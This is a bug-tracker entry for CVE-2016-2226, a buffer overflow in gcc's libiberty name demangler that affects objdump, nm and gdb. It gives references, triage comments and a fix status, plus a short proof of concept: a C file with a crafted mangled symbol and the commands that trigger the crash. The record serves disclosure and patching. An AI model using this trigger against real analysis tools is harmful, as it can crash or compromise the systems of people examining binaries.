Bugzilla – Bug 978812
VUL-1: CVE-2016-2226: gcc: Exploitable buffer overflow
Last modified: 2023-02-08 16:51:19 UTC
rh#1333322 / CVE-2016-2226 A vulnerability was found in gcc. Specifically, it revolves around demangling while analysing the untrusted binaries. A particularly malicious attacker could craft an executable that executes when *analysed* by objdump, nm or gdb, or any other libbfd / libiberty - based forensics tool (if the demangling option is switched on). External references: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=69687 References: http://seclists.org/oss-sec/2016/q2/238 Upstream fix: https://gcc.gnu.org/viewcvs/gcc?view=revision&revision=234829 References: https://bugzilla.redhat.com/show_bug.cgi?id=1333322 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2226 http://seclists.org/oss-sec/2016/q2/240
POC for PR69687 ======================== ** GDB and BINUTILS $ cat comileme.c #include <stdio.h> const char *__020A___________________X00020A___R0020A__U000R03000N99999999_020A__K000="Hello World"; int main() { printf("%s\n",__020A___________________X00020A___R0020A__U000R03000N99999999_020A__K000); } $ g++ compileme.c -o compileme $ ./compileme Hello World! $ gdb ./compileme .. $ objdump -x -C ./compileme .. $ nm -C ./compileme ..
bugbot adjusting priority
Bug in name demangling -> VUL-1
Fixed since a long time. (when libiberty, and hence binutils was affected: by version updates to binutils for sle-12 and sle-15 and sle-11 wontfix)